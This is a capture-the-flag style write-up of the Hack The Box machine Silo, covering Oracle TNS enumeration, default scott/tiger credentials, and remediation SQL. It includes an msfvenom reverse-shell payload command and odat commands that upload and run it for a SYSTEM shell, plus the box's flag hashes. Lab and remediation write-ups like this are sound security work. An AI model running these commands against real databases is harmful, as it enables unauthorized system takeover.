HTB Silo
Summary
HTB Silo is an easy-ranked retired box with an exposed Oracle database on TCP port 1521 that is still configured with default credentials. This gives direct access to the database software, which in turn allows arbitrary file upload and code execution on the host.
Service Enumeration
port | protocol | version | notes |
---|---|---|---|
135/tcp | msrpc | Microsoft Windows RPC | |
139/tcp | netbios-ssn | Microsoft Windows netbios-ssn | |
445/tcp | microsoft-ds | Microsoft Windows Server 2008 R2 - 2012 microsoft-ds | |
1521/tcp | oracle-tns | Oracle TNS listener 11.2.0.2.0 | Vulnerable; default credentials |
Nmap Scan results
Nmap scan report for 10.129.108.213
Host is up, received user-set (0.071s latency).
Scanned at 2023-09-20 01:33:37 UTC for 129s
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns syn-ack ttl 127 Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open oracle-tns syn-ack ttl 127 Oracle TNS listener (requires service name)
49160/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49161/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 63928/tcp): CLEAN (Couldn't connect)
| Check 2 (port 41696/tcp): CLEAN (Couldn't connect)
| Check 3 (port 24956/udp): CLEAN (Timeout)
| Check 4 (port 49229/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-09-20T01:35:43
|_ start_date: 2023-09-20T01:30:38
From our initial scan we can see an Oracle TNS listener on TCP 1521. Upon discovering this, the Metasploit module auxiliary/admin/oracle/sid_brute was used to attempt to discover valid SIDs on the server. A valid SID, XE, was discovered.
After discovering this SID, an msfvenom payload was created as follows:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f exe > reverse.exe
A handler was started in msfconsole and the payload was uploaded with odat, using the SID from above and the vendor-documented default credentials for Oracle DB:
odat utlfile -s 10.129.108.213 -U scott -P tiger --sysdba -d XE --putFile /temp reverse.exe /home/kali/Documents/htb/silo/reverse.exe
[1] (10.129.108.213:1521): Put the /home/kali/Documents/htb/silo/reverse.exe local file in the /temp folder like reverse.exe on the 10.129.108.213 server
[+] The /home/kali/Documents/htb/silo/reverse.exe file was created on the /temp directory on the 10.129.108.213 server like the reverse.exe file
The default credential pair scott:tiger was confirmed to work, and the payload was successfully uploaded to the remote host.
After successfully uploading the payload, it was then executed using odat as follows:
odat externaltable -s 10.129.108.213 --sysdba -d XE -U scott -P tiger --exec /temp reverse.exe
This resulted in successful execution of the payload and a reverse shell running as NT AUTHORITY\SYSTEM.
Vulnerability Explanation
By leaving the application configured with default credentials, an attacker can trivially gain unauthorized access simply by consulting vendor documentation. Many database systems expose functions that allow arbitrary file read, file write and command execution on the underlying host, so a single database logon can result in complete compromise of the server.
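The condition exploited above can be found from the DBA side before an attacker does. The queries below are an added example for this write-up, not part of the original report or of the odat/Metasploit tooling it uses. They assume Oracle 11g or later and a session with DBA privileges; DBA_USERS_WITH_DEFPWD is the vendor view that lists accounts whose password hash still matches the well-known default for that account, and the privilege checks cover the packages and system privileges that turn a database logon into file write and code execution.

```sql
-- Added audit example (not from the original write-up). Run as a DBA user.

-- 1. Accounts still carrying a vendor-default password (SCOTT/tiger is one of them).
--    Anything returned here is the exact condition abused in the write-up.
SELECT d.username,
       u.account_status,
       u.profile
  FROM dba_users_with_defpwd d
  JOIN dba_users u ON u.username = d.username
 ORDER BY d.username;

-- 2. Sample/demo schemas that have no business existing on a production database.
SELECT username, account_status, created
  FROM dba_users
 WHERE username IN ('SCOTT', 'HR', 'OE', 'SH', 'PM', 'IX', 'BI')
   AND account_status NOT LIKE '%LOCKED%';

-- 3. Password-file administrators: the --sysdba flag in the write-up only works
--    if the account holds SYSDBA, which should never be true for a sample user.
SELECT username, sysdba, sysoper
  FROM v$pwfile_users;

-- 4. Who can touch the host filesystem or schedule OS-level work from inside the
--    database. UTL_FILE is the package behind the file upload shown above.
SELECT grantee, table_name AS package_name, privilege
  FROM dba_tab_privs
 WHERE table_name IN ('UTL_FILE', 'DBMS_SCHEDULER', 'DBMS_JAVA')
   AND grantee IN ('PUBLIC', 'SCOTT')
 ORDER BY grantee, table_name;

-- 5. System privileges that allow creating directory objects or external jobs,
--    which is what external-table execution relies on.
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY DIRECTORY', 'CREATE JOB', 'CREATE EXTERNAL JOB')
 ORDER BY grantee, privilege;

-- 6. Directory objects already pointing at writable host paths.
SELECT owner, directory_name, directory_path
  FROM dba_directories
 ORDER BY directory_name;
```

Any row from query 1 or 3 is a finding on its own; rows from queries 4 to 6 are what decide whether such a logon stops at the database or reaches the operating system, as it did on this box.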
Vulnerability Fix
Change credentials from their default values before moving a system into production. Ensure that your password policy requires regular rotation and passwords of at least 12 characters, using upper- and lower-case letters, digits and symbols.
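The following script is an added example of how a DBA would apply that fix to the configuration described in this write-up; it is not part of the original report. It assumes Oracle 11g or later and a SYS session (Oracle requires password verification functions to be owned by SYS). The profile name SECURE_PROFILE, the function name SILO_PASSWORD_VERIFY and the account APP_USER are placeholder names chosen for this example. Beyond the password policy the report asks for, it also locks the sample account and withdraws the privileges that made the file upload and execution possible, since a strong password on an account nobody should be using is still the wrong fix.

```sql
-- Added remediation example (not from the original write-up). Run as SYS.

-- 1. Close the path that was exploited: lock and expire the sample account.
--    If nothing depends on the SCOTT schema, DROP USER scott CASCADE; is the
--    better option.
ALTER USER scott ACCOUNT LOCK PASSWORD EXPIRE;

-- 2. Withdraw the privileges that turned a logon into file write and code
--    execution. (REVOKE SYSDBA fails harmlessly if the grant is not present.)
REVOKE SYSDBA FROM scott;
REVOKE EXECUTE ON sys.utl_file FROM public;
REVOKE EXECUTE ON sys.dbms_scheduler FROM public;

-- 3. Complexity function enforcing the policy from the fix section:
--    12+ characters, upper, lower, digit and symbol, not equal to the
--    username or to the previous password.
CREATE OR REPLACE FUNCTION silo_password_verify (
    username     VARCHAR2,
    password     VARCHAR2,
    old_password VARCHAR2
) RETURN BOOLEAN IS
BEGIN
    IF LENGTH(password) < 12 THEN
        raise_application_error(-20001, 'Password must be at least 12 characters');
    END IF;
    IF UPPER(password) = UPPER(username) THEN
        raise_application_error(-20002, 'Password must not match the username');
    END IF;
    IF old_password IS NOT NULL AND password = old_password THEN
        raise_application_error(-20003, 'Password must differ from the previous one');
    END IF;
    IF NOT REGEXP_LIKE(password, '[[:upper:]]')
       OR NOT REGEXP_LIKE(password, '[[:lower:]]')
       OR NOT REGEXP_LIKE(password, '[[:digit:]]')
       OR NOT REGEXP_LIKE(password, '[^[:alnum:]]') THEN
        raise_application_error(-20004,
            'Password needs upper-case, lower-case, digit and symbol characters');
    END IF;
    RETURN TRUE;
END;
/

-- 4. Profile carrying rotation, reuse limits and lockout, tied to the function.
--    Times are in days: 90-day lifetime, 7-day grace period, 1-day lockout.
CREATE PROFILE secure_profile LIMIT
    PASSWORD_LIFE_TIME        90
    PASSWORD_GRACE_TIME       7
    PASSWORD_REUSE_TIME       365
    PASSWORD_REUSE_MAX        10
    FAILED_LOGIN_ATTEMPTS     5
    PASSWORD_LOCK_TIME        1
    PASSWORD_VERIFY_FUNCTION  silo_password_verify;

-- 5. Assign the profile to each real application account and force a change
--    at next logon so the new policy is applied to the existing password too.
ALTER USER app_user PROFILE secure_profile;   -- app_user: placeholder name
ALTER USER app_user PASSWORD EXPIRE;

-- 6. Record logons and use of the file package so the next attempt is visible
--    (requires the AUDIT_TRAIL initialization parameter to be DB or DB,EXTENDED).
AUDIT SESSION;
AUDIT EXECUTE ON sys.utl_file BY ACCESS;
```

After this runs, the odat steps shown earlier fail at the first hurdle: the scott account is locked, and even a valid application password no longer carries UTL_FILE or SYSDBA, so a database logon stays a database logon.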
Severity
Assessed CVSS 3.0: 9.5 Critical
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C
Proof Of Concept Code
No exploit code was used; this issue was caused by misconfiguration.
Proof Screenshot: User, Admin (screenshots not included in this copy)
Proof Text
User
f541cb8ce4a5856a57393bee39efd419
Admin
6db42932c1287dd5e8a53c4635eb729d